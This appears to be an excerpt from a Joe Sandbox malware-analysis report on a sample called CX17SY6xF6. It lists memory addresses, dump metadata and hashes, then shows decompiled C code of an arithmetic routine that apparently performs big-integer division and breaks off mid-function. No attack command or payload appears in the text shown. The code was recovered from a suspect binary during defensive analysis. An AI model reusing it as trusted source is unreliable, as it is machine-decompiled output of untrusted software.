                                                                                                                                                                                                                                                    0x010e19bd
                                                                                                                                                                                                                                                    0x010e19be
                                                                                                                                                                                                                                                    0x010e19c1
                                                                                                                                                                                                                                                    0x010e19cb
                                                                                                                                                                                                                                                    0x010e19ce
                                                                                                                                                                                                                                                    0x010e19cf
                                                                                                                                                                                                                                                    0x010e19d1
                                                                                                                                                                                                                                                    0x010e19e5
                                                                                                                                                                                                                                                    0x010e19e5
                                                                                                                                                                                                                                                    0x010e19e8
                                                                                                                                                                                                                                                    0x010e19f2
                                                                                                                                                                                                                                                    0x010e19f7
                                                                                                                                                                                                                                                    0x010e19fa
                                                                                                                                                                                                                                                    0x010e19fc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e19fe
                                                                                                                                                                                                                                                    0x010e1a02
                                                                                                                                                                                                                                                    0x010e1a0b
                                                                                                                                                                                                                                                    0x010e1a11
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1a13
                                                                                                                                                                                                                                                    0x010e19d3
                                                                                                                                                                                                                                                    0x010e19d3
                                                                                                                                                                                                                                                    0x010e19d9
                                                                                                                                                                                                                                                    0x010e19de
                                                                                                                                                                                                                                                    0x010e19e1
                                                                                                                                                                                                                                                    0x010e19e3
                                                                                                                                                                                                                                                    0x010e1a1a
                                                                                                                                                                                                                                                    0x010e1a1c
                                                                                                                                                                                                                                                    0x010e1a1d
                                                                                                                                                                                                                                                    0x010e1a1e
                                                                                                                                                                                                                                                    0x010e1a1f
                                                                                                                                                                                                                                                    0x010e1a20
                                                                                                                                                                                                                                                    0x010e1a21
                                                                                                                                                                                                                                                    0x010e1a26
                                                                                                                                                                                                                                                    0x010e1a2a
                                                                                                                                                                                                                                                    0x010e1a2c
                                                                                                                                                                                                                                                    0x010e1a32
                                                                                                                                                                                                                                                    0x010e1a39
                                                                                                                                                                                                                                                    0x010e1a3c
                                                                                                                                                                                                                                                    0x010e1a3f
                                                                                                                                                                                                                                                    0x010e1a42
                                                                                                                                                                                                                                                    0x010e1a43
                                                                                                                                                                                                                                                    0x010e1a46
                                                                                                                                                                                                                                                    0x010e1a47
                                                                                                                                                                                                                                                    0x010e1a4a
                                                                                                                                                                                                                                                    0x010e1a4d
                                                                                                                                                                                                                                                    0x010e1a53
                                                                                                                                                                                                                                                    0x010e1a5d
                                                                                                                                                                                                                                                    0x010e1a79
                                                                                                                                                                                                                                                    0x010e1a79
                                                                                                                                                                                                                                                    0x010e1a7b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1a60
                                                                                                                                                                                                                                                    0x010e1a63
                                                                                                                                                                                                                                                    0x010e1a6a
                                                                                                                                                                                                                                                    0x010e1a6c
                                                                                                                                                                                                                                                    0x010e1a6f
                                                                                                                                                                                                                                                    0x010e1a71
                                                                                                                                                                                                                                                    0x010e1a74
                                                                                                                                                                                                                                                    0x010e1a76
                                                                                                                                                                                                                                                    0x010e1a76
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1a76
                                                                                                                                                                                                                                                    0x010e1a74
                                                                                                                                                                                                                                                    0x010e1a6f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1a6a
                                                                                                                                                                                                                                                    0x010e1a7d
                                                                                                                                                                                                                                                    0x010e1a80
                                                                                                                                                                                                                                                    0x010e1a83
                                                                                                                                                                                                                                                    0x010e1a9f
                                                                                                                                                                                                                                                    0x010e1aa1
                                                                                                                                                                                                                                                    0x010e1aa3
                                                                                                                                                                                                                                                    0x010e1aa5
                                                                                                                                                                                                                                                    0x010e1aa6
                                                                                                                                                                                                                                                    0x010e1aa9
                                                                                                                                                                                                                                                    0x010e1abf
                                                                                                                                                                                                                                                    0x010e1ac1
                                                                                                                                                                                                                                                    0x010e1ac1
                                                                                                                                                                                                                                                    0x010e1aab
                                                                                                                                                                                                                                                    0x010e1aad
                                                                                                                                                                                                                                                    0x010e1aae
                                                                                                                                                                                                                                                    0x010e1ab1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1ab3
                                                                                                                                                                                                                                                    0x010e1ab5
                                                                                                                                                                                                                                                    0x010e1ab6
                                                                                                                                                                                                                                                    0x010e1ab9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1abb
                                                                                                                                                                                                                                                    0x010e1abb
                                                                                                                                                                                                                                                    0x010e1abb
                                                                                                                                                                                                                                                    0x010e1ab9
                                                                                                                                                                                                                                                    0x010e1ab1
                                                                                                                                                                                                                                                    0x010e1ac9
                                                                                                                                                                                                                                                    0x010e1ad1
                                                                                                                                                                                                                                                    0x010e1ad5
                                                                                                                                                                                                                                                    0x010e1ae3
                                                                                                                                                                                                                                                    0x010e1ae8
                                                                                                                                                                                                                                                    0x010e1afd
                                                                                                                                                                                                                                                    0x010e1aff
                                                                                                                                                                                                                                                    0x010e1b02
                                                                                                                                                                                                                                                    0x010e1b37
                                                                                                                                                                                                                                                    0x010e1b42
                                                                                                                                                                                                                                                    0x010e1b42
                                                                                                                                                                                                                                                    0x010e1b47
                                                                                                                                                                                                                                                    0x010e1b4d
                                                                                                                                                                                                                                                    0x010e1b4e
                                                                                                                                                                                                                                                    0x010e1b4e
                                                                                                                                                                                                                                                    0x010e1b55
                                                                                                                                                                                                                                                    0x010e1b72
                                                                                                                                                                                                                                                    0x010e1b72
                                                                                                                                                                                                                                                    0x010e1b81
                                                                                                                                                                                                                                                    0x010e1b86
                                                                                                                                                                                                                                                    0x010e1b89
                                                                                                                                                                                                                                                    0x010e1b8b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1b57
                                                                                                                                                                                                                                                    0x010e1b57
                                                                                                                                                                                                                                                    0x010e1b5e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1b60
                                                                                                                                                                                                                                                    0x010e1b60
                                                                                                                                                                                                                                                    0x010e1b67
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1b69
                                                                                                                                                                                                                                                    0x010e1b69
                                                                                                                                                                                                                                                    0x010e1b70
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1b70
                                                                                                                                                                                                                                                    0x010e1b67
                                                                                                                                                                                                                                                    0x010e1b5e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1b8d
                                                                                                                                                                                                                                                    0x010e1b95
                                                                                                                                                                                                                                                    0x010e1b9b
                                                                                                                                                                                                                                                    0x010e1ba1
                                                                                                                                                                                                                                                    0x010e1ba5
                                                                                                                                                                                                                                                    0x010e1ba5
                                                                                                                                                                                                                                                    0x010e1ba8
                                                                                                                                                                                                                                                    0x010e1baa
                                                                                                                                                                                                                                                    0x010e1bb0
                                                                                                                                                                                                                                                    0x010e1bb7
                                                                                                                                                                                                                                                    0x010e1bba
                                                                                                                                                                                                                                                    0x010e1bbc
                                                                                                                                                                                                                                                    0x010e1bd0
                                                                                                                                                                                                                                                    0x010e1bd5
                                                                                                                                                                                                                                                    0x010e1b04
                                                                                                                                                                                                                                                    0x010e1b0a
                                                                                                                                                                                                                                                    0x010e1b0e
                                                                                                                                                                                                                                                    0x010e1b16
                                                                                                                                                                                                                                                    0x010e1b16
                                                                                                                                                                                                                                                    0x010e1b16
                                                                                                                                                                                                                                                    0x010e1b18
                                                                                                                                                                                                                                                    0x010e1b1b
                                                                                                                                                                                                                                                    0x010e1b1e
                                                                                                                                                                                                                                                    0x010e1b1e
                                                                                                                                                                                                                                                    0x010e1a85
                                                                                                                                                                                                                                                    0x010e1a88
                                                                                                                                                                                                                                                    0x010e1a8a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1a8c
                                                                                                                                                                                                                                                    0x010e1a8c
                                                                                                                                                                                                                                                    0x010e1a92
                                                                                                                                                                                                                                                    0x010e1a97
                                                                                                                                                                                                                                                    0x010e1a8a
                                                                                                                                                                                                                                                    0x010e1b2b
                                                                                                                                                                                                                                                    0x010e1b36
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e19e3
                                                                                                                                                                                                                                                    0x010e19b8
                                                                                                                                                                                                                                                    0x010e19ba
                                                                                                                                                                                                                                                    0x010e1a14
                                                                                                                                                                                                                                                    0x010e1a19
                                                                                                                                                                                                                                                    0x010e1a19
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                    • API String ID: 0-2043925204
                                                                                                                                                                                                                                                    • Opcode ID: 34a2f6539d2da4f513edc96beb42d22d8f773cab27dceb051ac763439924f0b0
                                                                                                                                                                                                                                                    • Instruction ID: 20231f90c568f36e0d8a5de56f0d9c0a2dc8307e0207e953ae0ea3211e917dd1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a2f6539d2da4f513edc96beb42d22d8f773cab27dceb051ac763439924f0b0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25411672600219AEDB249EBADC4CEBB7BF8EB84714F1442A9F94597180E6709E818B50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                                                    			E010D8340(signed int* _a4, signed int* _a8) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                                                    				signed int* _v80;
                                                                                                                                                                                                                                                    				char _v540;
                                                                                                                                                                                                                                                    				signed int _v544;
                                                                                                                                                                                                                                                    				signed int _t197;
                                                                                                                                                                                                                                                    				signed int _t198;
                                                                                                                                                                                                                                                    				signed int* _t200;
                                                                                                                                                                                                                                                    				signed int _t201;
                                                                                                                                                                                                                                                    				signed int _t204;
                                                                                                                                                                                                                                                    				signed int _t206;
                                                                                                                                                                                                                                                    				signed int _t208;
                                                                                                                                                                                                                                                    				signed int _t209;
                                                                                                                                                                                                                                                    				signed int _t213;
                                                                                                                                                                                                                                                    				signed int _t219;
                                                                                                                                                                                                                                                    				intOrPtr _t225;
                                                                                                                                                                                                                                                    				void* _t228;
                                                                                                                                                                                                                                                    				signed int _t230;
                                                                                                                                                                                                                                                    				signed int _t247;
                                                                                                                                                                                                                                                    				signed int _t250;
                                                                                                                                                                                                                                                    				void* _t253;
                                                                                                                                                                                                                                                    				signed int _t256;
                                                                                                                                                                                                                                                    				signed int* _t262;
                                                                                                                                                                                                                                                    				signed int _t263;
                                                                                                                                                                                                                                                    				signed int _t264;
                                                                                                                                                                                                                                                    				void* _t265;
                                                                                                                                                                                                                                                    				intOrPtr* _t266;
                                                                                                                                                                                                                                                    				signed int _t267;
                                                                                                                                                                                                                                                    				signed int _t269;
                                                                                                                                                                                                                                                    				signed int _t270;
                                                                                                                                                                                                                                                    				signed int _t271;
                                                                                                                                                                                                                                                    				signed int _t272;
                                                                                                                                                                                                                                                    				signed int* _t274;
                                                                                                                                                                                                                                                    				signed int* _t278;
                                                                                                                                                                                                                                                    				signed int _t279;
                                                                                                                                                                                                                                                    				signed int _t280;
                                                                                                                                                                                                                                                    				intOrPtr _t282;
                                                                                                                                                                                                                                                    				void* _t286;
                                                                                                                                                                                                                                                    				signed char _t292;
                                                                                                                                                                                                                                                    				signed int _t295;
                                                                                                                                                                                                                                                    				signed int _t303;
                                                                                                                                                                                                                                                    				signed int _t306;
                                                                                                                                                                                                                                                    				signed int _t307;
                                                                                                                                                                                                                                                    				signed int _t309;
                                                                                                                                                                                                                                                    				signed int _t311;
                                                                                                                                                                                                                                                    				signed int _t313;
                                                                                                                                                                                                                                                    				intOrPtr* _t314;
                                                                                                                                                                                                                                                    				signed int _t318;
                                                                                                                                                                                                                                                    				signed int _t322;
                                                                                                                                                                                                                                                    				signed int* _t328;
                                                                                                                                                                                                                                                    				signed int _t330;
                                                                                                                                                                                                                                                    				signed int _t331;
                                                                                                                                                                                                                                                    				signed int _t333;
                                                                                                                                                                                                                                                    				void* _t334;
                                                                                                                                                                                                                                                    				signed int _t336;
                                                                                                                                                                                                                                                    				signed int _t338;
                                                                                                                                                                                                                                                    				signed int _t341;
                                                                                                                                                                                                                                                    				signed int _t342;
                                                                                                                                                                                                                                                    				signed int* _t344;
                                                                                                                                                                                                                                                    				signed int _t349;
                                                                                                                                                                                                                                                    				signed int _t351;
                                                                                                                                                                                                                                                    				void* _t355;
                                                                                                                                                                                                                                                    				signed int _t359;
                                                                                                                                                                                                                                                    				signed int _t360;
                                                                                                                                                                                                                                                    				signed int _t362;
                                                                                                                                                                                                                                                    				signed int* _t368;
                                                                                                                                                                                                                                                    				signed int* _t369;
                                                                                                                                                                                                                                                    				signed int* _t370;
                                                                                                                                                                                                                                                    				signed int* _t373;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t262 = _a4;
                                                                                                                                                                                                                                                    				_t197 =  *_t262;
                                                                                                                                                                                                                                                    				if(_t197 != 0) {
                                                                                                                                                                                                                                                    					_t328 = _a8;
                                                                                                                                                                                                                                                    					_t267 =  *_t328;
                                                                                                                                                                                                                                                    					__eflags = _t267;
                                                                                                                                                                                                                                                    					if(_t267 != 0) {
                                                                                                                                                                                                                                                    						_t349 = _t197 - 1;
                                                                                                                                                                                                                                                    						_t198 = _t267 - 1;
                                                                                                                                                                                                                                                    						_v16 = _t349;
                                                                                                                                                                                                                                                    						__eflags = _t198;
                                                                                                                                                                                                                                                    						if(_t198 != 0) {
                                                                                                                                                                                                                                                    							__eflags = _t198 - _t349;
                                                                                                                                                                                                                                                    							if(_t198 > _t349) {
                                                                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t306 = _t349 - _t198;
                                                                                                                                                                                                                                                    								_v60 = _t198 + 1;
                                                                                                                                                                                                                                                    								_t269 = _t349;
                                                                                                                                                                                                                                                    								__eflags = _t349 - _t306;
                                                                                                                                                                                                                                                    								if(_t349 < _t306) {
                                                                                                                                                                                                                                                    									L21:
                                                                                                                                                                                                                                                    									_t306 = _t306 + 1;
                                                                                                                                                                                                                                                    									__eflags = _t306;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_t368 =  &(_t262[_t349 + 1]);
                                                                                                                                                                                                                                                    									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                                                                                                                                                                                                                                                    									__eflags = _t341;
                                                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                                                    										__eflags =  *_t341 -  *_t368;
                                                                                                                                                                                                                                                    										if( *_t341 !=  *_t368) {
                                                                                                                                                                                                                                                    											break;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_t269 = _t269 - 1;
                                                                                                                                                                                                                                                    										_t341 = _t341 - 4;
                                                                                                                                                                                                                                                    										_t368 = _t368 - 4;
                                                                                                                                                                                                                                                    										__eflags = _t269 - _t306;
                                                                                                                                                                                                                                                    										if(_t269 >= _t306) {
                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											goto L21;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										goto L22;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_t369 = _a8;
                                                                                                                                                                                                                                                    									_t54 = (_t269 - _t306) * 4; // 0x8b00ffff
                                                                                                                                                                                                                                                    									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                                                                                                                                                                                                                                                    									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                                                                                                                                                                                                                                                    										goto L21;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								L22:
                                                                                                                                                                                                                                                    								__eflags = _t306;
                                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                                    									_t330 = _v60;
                                                                                                                                                                                                                                                    									_t200 = _a8;
                                                                                                                                                                                                                                                    									_t351 =  *(_t200 + _t330 * 4);
                                                                                                                                                                                                                                                    									_t64 = _t330 * 4; // 0x220
                                                                                                                                                                                                                                                    									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                                                                                                                                                                                                                                                    									_v36 = _t201;
                                                                                                                                                                                                                                                    									asm("bsr eax, esi");
                                                                                                                                                                                                                                                    									_v56 = _t351;
                                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                                    										_t270 = 0x20;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_t270 = 0x1f - _t201;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v40 = _t270;
                                                                                                                                                                                                                                                    									_v64 = 0x20 - _t270;
                                                                                                                                                                                                                                                    									__eflags = _t270;
                                                                                                                                                                                                                                                    									if(_t270 != 0) {
                                                                                                                                                                                                                                                    										_t292 = _v40;
                                                                                                                                                                                                                                                    										_v36 = _v36 << _t292;
                                                                                                                                                                                                                                                    										_v56 = _t351 << _t292 | _v36 >> _v64;
                                                                                                                                                                                                                                                    										__eflags = _t330 - 2;
                                                                                                                                                                                                                                                    										if(_t330 > 2) {
                                                                                                                                                                                                                                                    											_t79 = _t330 * 4; // 0xe850ffff
                                                                                                                                                                                                                                                    											_t81 =  &_v36;
                                                                                                                                                                                                                                                    											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                                                                                                                                                                                                                                                    											__eflags =  *_t81;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v76 = 0;
                                                                                                                                                                                                                                                    									_t307 = _t306 + 0xffffffff;
                                                                                                                                                                                                                                                    									__eflags = _t307;
                                                                                                                                                                                                                                                    									_v32 = _t307;
                                                                                                                                                                                                                                                    									if(_t307 < 0) {
                                                                                                                                                                                                                                                    										_t331 = 0;
                                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v20 =  &(( &(_t262[1]))[_t307]);
                                                                                                                                                                                                                                                    										_t206 = _t307 + _t330;
                                                                                                                                                                                                                                                    										_v12 = _t206;
                                                                                                                                                                                                                                                    										_t278 = _t262 - 4 + _t206 * 4;
                                                                                                                                                                                                                                                    										_v80 = _t278;
                                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                                    											__eflags = _t206 - _v16;
                                                                                                                                                                                                                                                    											if(_t206 > _v16) {
                                                                                                                                                                                                                                                    												_t207 = 0;
                                                                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												_t207 = _t278[2];
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											__eflags = _v40;
                                                                                                                                                                                                                                                    											_t311 = _t278[1];
                                                                                                                                                                                                                                                    											_t279 =  *_t278;
                                                                                                                                                                                                                                                    											_v52 = _t207;
                                                                                                                                                                                                                                                    											_v44 = 0;
                                                                                                                                                                                                                                                    											_v8 = _t207;
                                                                                                                                                                                                                                                    											_v24 = _t279;
                                                                                                                                                                                                                                                    											if(_v40 > 0) {
                                                                                                                                                                                                                                                    												_t318 = _v8;
                                                                                                                                                                                                                                                    												_t336 = _t279 >> _v64;
                                                                                                                                                                                                                                                    												_t230 = E010DDCB0(_t311, _v40, _t318);
                                                                                                                                                                                                                                                    												_t279 = _v40;
                                                                                                                                                                                                                                                    												_t207 = _t318;
                                                                                                                                                                                                                                                    												_t311 = _t336 | _t230;
                                                                                                                                                                                                                                                    												_t359 = _v24 << _t279;
                                                                                                                                                                                                                                                    												__eflags = _v12 - 3;
                                                                                                                                                                                                                                                    												_v8 = _t318;
                                                                                                                                                                                                                                                    												_v24 = _t359;
                                                                                                                                                                                                                                                    												if(_v12 >= 3) {
                                                                                                                                                                                                                                                    													_t279 = _v64;
                                                                                                                                                                                                                                                    													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                                                                                                                                                                                                                                                    													__eflags = _t360;
                                                                                                                                                                                                                                                    													_t207 = _v8;
                                                                                                                                                                                                                                                    													_v24 = _t360;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t208 = E010DDCD0(_t311, _t207, _v56, 0);
                                                                                                                                                                                                                                                    											_v44 = _t262;
                                                                                                                                                                                                                                                    											_t263 = _t208;
                                                                                                                                                                                                                                                    											_v44 = 0;
                                                                                                                                                                                                                                                    											_t209 = _t311;
                                                                                                                                                                                                                                                    											_v8 = _t263;
                                                                                                                                                                                                                                                    											_v28 = _t209;
                                                                                                                                                                                                                                                    											_t333 = _t279;
                                                                                                                                                                                                                                                    											_v72 = _t263;
                                                                                                                                                                                                                                                    											_v68 = _t209;
                                                                                                                                                                                                                                                    											__eflags = _t209;
                                                                                                                                                                                                                                                    											if(_t209 != 0) {
                                                                                                                                                                                                                                                    												L40:
                                                                                                                                                                                                                                                    												_t264 = _t263 + 1;
                                                                                                                                                                                                                                                    												asm("adc eax, 0xffffffff");
                                                                                                                                                                                                                                                    												_t333 = _t333 + E010DDC70(_t264, _t209, _v56, 0);
                                                                                                                                                                                                                                                    												asm("adc esi, edx");
                                                                                                                                                                                                                                                    												_t263 = _t264 | 0xffffffff;
                                                                                                                                                                                                                                                    												_t209 = 0;
                                                                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                                                                    												_v44 = 0;
                                                                                                                                                                                                                                                    												_v8 = _t263;
                                                                                                                                                                                                                                                    												_v72 = _t263;
                                                                                                                                                                                                                                                    												_v28 = 0;
                                                                                                                                                                                                                                                    												_v68 = 0;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												__eflags = _t263 - 0xffffffff;
                                                                                                                                                                                                                                                    												if(_t263 > 0xffffffff) {
                                                                                                                                                                                                                                                    													goto L40;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                                                                                                    											if(0 <= 0) {
                                                                                                                                                                                                                                                    												if(0 < 0) {
                                                                                                                                                                                                                                                    													goto L44;
                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                    													__eflags = _t333 - 0xffffffff;
                                                                                                                                                                                                                                                    													if(_t333 <= 0xffffffff) {
                                                                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                                                                    															L44:
                                                                                                                                                                                                                                                    															_v8 = _v24;
                                                                                                                                                                                                                                                    															_t228 = E010DDC70(_v36, 0, _t263, _t209);
                                                                                                                                                                                                                                                    															__eflags = _t311 - _t333;
                                                                                                                                                                                                                                                    															if(__eflags < 0) {
                                                                                                                                                                                                                                                    																break;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															if(__eflags > 0) {
                                                                                                                                                                                                                                                    																L47:
                                                                                                                                                                                                                                                    																_t209 = _v28;
                                                                                                                                                                                                                                                    																_t263 = _t263 + 0xffffffff;
                                                                                                                                                                                                                                                    																_v72 = _t263;
                                                                                                                                                                                                                                                    																asm("adc eax, 0xffffffff");
                                                                                                                                                                                                                                                    																_t333 = _t333 + _v56;
                                                                                                                                                                                                                                                    																__eflags = _t333;
                                                                                                                                                                                                                                                    																_v28 = _t209;
                                                                                                                                                                                                                                                    																asm("adc dword [ebp-0x28], 0x0");
                                                                                                                                                                                                                                                    																_v68 = _t209;
                                                                                                                                                                                                                                                    																if(_t333 == 0) {
                                                                                                                                                                                                                                                    																	__eflags = _t333 - 0xffffffff;
                                                                                                                                                                                                                                                    																	if(_t333 <= 0xffffffff) {
                                                                                                                                                                                                                                                    																		continue;
                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                    																__eflags = _t228 - _v8;
                                                                                                                                                                                                                                                    																if(_t228 <= _v8) {
                                                                                                                                                                                                                                                    																	break;
                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                    																	goto L47;
                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															L51:
                                                                                                                                                                                                                                                    															_v8 = _t263;
                                                                                                                                                                                                                                                    															goto L52;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														_t209 = _v28;
                                                                                                                                                                                                                                                    														goto L51;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											L52:
                                                                                                                                                                                                                                                    											__eflags = _t209;
                                                                                                                                                                                                                                                    											if(_t209 != 0) {
                                                                                                                                                                                                                                                    												L54:
                                                                                                                                                                                                                                                    												_t280 = _v60;
                                                                                                                                                                                                                                                    												_t334 = 0;
                                                                                                                                                                                                                                                    												_t355 = 0;
                                                                                                                                                                                                                                                    												__eflags = _t280;
                                                                                                                                                                                                                                                    												if(_t280 != 0) {
                                                                                                                                                                                                                                                    													_t266 = _v20;
                                                                                                                                                                                                                                                    													_t219 =  &(_a8[1]);
                                                                                                                                                                                                                                                    													__eflags = _t219;
                                                                                                                                                                                                                                                    													_v24 = _t219;
                                                                                                                                                                                                                                                    													_v16 = _t280;
                                                                                                                                                                                                                                                    													do {
                                                                                                                                                                                                                                                    														_v44 =  *_t219;
                                                                                                                                                                                                                                                    														_t225 =  *_t266;
                                                                                                                                                                                                                                                    														_t286 = _t334 + _v72 * _v44;
                                                                                                                                                                                                                                                    														asm("adc esi, edx");
                                                                                                                                                                                                                                                    														_t334 = _t355;
                                                                                                                                                                                                                                                    														_t355 = 0;
                                                                                                                                                                                                                                                    														__eflags = _t225 - _t286;
                                                                                                                                                                                                                                                    														if(_t225 < _t286) {
                                                                                                                                                                                                                                                    															_t334 = _t334 + 1;
                                                                                                                                                                                                                                                    															asm("adc esi, esi");
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														 *_t266 = _t225 - _t286;
                                                                                                                                                                                                                                                    														_t266 = _t266 + 4;
                                                                                                                                                                                                                                                    														_t219 = _v24 + 4;
                                                                                                                                                                                                                                                    														_t164 =  &_v16;
                                                                                                                                                                                                                                                    														 *_t164 = _v16 - 1;
                                                                                                                                                                                                                                                    														__eflags =  *_t164;
                                                                                                                                                                                                                                                    														_v24 = _t219;
                                                                                                                                                                                                                                                    													} while ( *_t164 != 0);
                                                                                                                                                                                                                                                    													_t263 = _v8;
                                                                                                                                                                                                                                                    													_t280 = _v60;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												__eflags = 0 - _t355;
                                                                                                                                                                                                                                                    												if(__eflags <= 0) {
                                                                                                                                                                                                                                                    													if(__eflags < 0) {
                                                                                                                                                                                                                                                    														L63:
                                                                                                                                                                                                                                                    														__eflags = _t280;
                                                                                                                                                                                                                                                    														if(_t280 != 0) {
                                                                                                                                                                                                                                                    															_t338 = _t280;
                                                                                                                                                                                                                                                    															_t314 = _v20;
                                                                                                                                                                                                                                                    															_t362 =  &(_a8[1]);
